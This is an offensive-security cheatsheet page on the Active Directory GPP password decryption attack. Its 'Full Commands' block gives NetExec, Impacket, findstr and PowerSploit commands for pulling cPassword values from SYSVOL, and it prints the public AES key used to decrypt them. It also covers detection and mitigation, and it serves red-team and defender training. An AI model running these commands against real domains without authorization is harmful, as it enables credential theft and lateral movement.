daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-48-gpp-password-decryption.md (3253B)


      1 ---
      2 title: "Attack #48 β€” GPP Password Decryption"
      3 description: "Group Policy Preferences (GPP) allowed admins to set local admin passwords, create scheduled tasks, and configure services via Group Policy β€” with the…"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory"]
      7 tools: ["NetExec", "Impacket", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/🟣 Attack #48 β€” GPP Password Decryption.md"
     11 ---
     12 # 🟣 Attack #48 β€” GPP Password Decryption
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Group Policy Preferences (GPP) allowed admins to set local admin passwords, create scheduled tasks, and configure services via Group Policy β€” with the password stored in `cPassword` in XML files on SYSVOL. Microsoft encrypted these passwords with a **publicly-known static AES key** (published in MSDN documentation), making any GPP password trivially decryptable by any domain user who can read SYSVOL.
     19 
     20 Microsoft patched this in **MS14-025** (May 2014), but old GPP XML files may still exist on SYSVOL.
     21 
     22 ***
     23 
     24 ## βš™οΈ Prerequisites
     25 
     26 | Requirement | Detail |
     27 |---|---|
     28 | **Any domain user** | SYSVOL is readable by all authenticated users |
     29 | **Legacy GPP files still present** | Created before MS14-025 |
     30 
     31 ***
     32 
     33 ## πŸ’» Full Commands
     34 
     35 ```bash
     36 # ── NetExec β€” automated GPP password extraction ──────────────────────────────
     37 nxc smb DC01.corp.local -u low_user -p 'Password1' -M gpp_password
     38 
     39 # ── Impacket β€” Get-GPPPassword ────────────────────────────────────────────────
     40 Get-GPPPassword.py corp.local/low_user:'Password1'@DC01.corp.local
     41 
     42 # ── Manual β€” search SYSVOL for cPassword ──────────────────────────────────────
     43 findstr /S /I cPassword \\corp.local\SYSVOL\corp.local\Policies\*.xml
     44 
     45 # ── Decrypt the cPassword value ───────────────────────────────────────────────
     46 gpp-decrypt <cPassword_value>
     47 # The AES key is: 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
     48 ```
     49 
     50 ```powershell
     51 # ── PowerSploit ───────────────────────────────────────────────────────────────
     52 Import-Module .\PowerSploit.ps1
     53 Get-CachedGPPPassword
     54 Get-GPPPassword
     55 ```
     56 
     57 ***
     58 
     59 ## πŸ›‘οΈ Detection β€” Event IDs
     60 
     61 | Event ID | Source | What to Look For |
     62 |---|---|---|
     63 | **5145** | Security Log (DC) | Access to SYSVOL β€” reading Policy XML files |
     64 
     65 ***
     66 
     67 ## πŸ”— Attack Chain Context
     68 
     69 ```
     70 [GPP Passwords] ──→ Decrypt legacy local admin passwords from SYSVOL
     71          β”‚
     72          β”œβ”€β”€β†’ πŸ”‘ Extracted passwords often = local admin on many machines
     73          β”œβ”€β”€β†’ πŸ”— PtH (#4) with discovered credentials β†’ lateral movement
     74          └──→ πŸ’€ Defeated by: delete old GPP XML files, use LAPS instead
     75 ```
     76 
     77 ***
     78 
     79 > βœ… **Attack #48 β€” GPP Password Decryption complete.**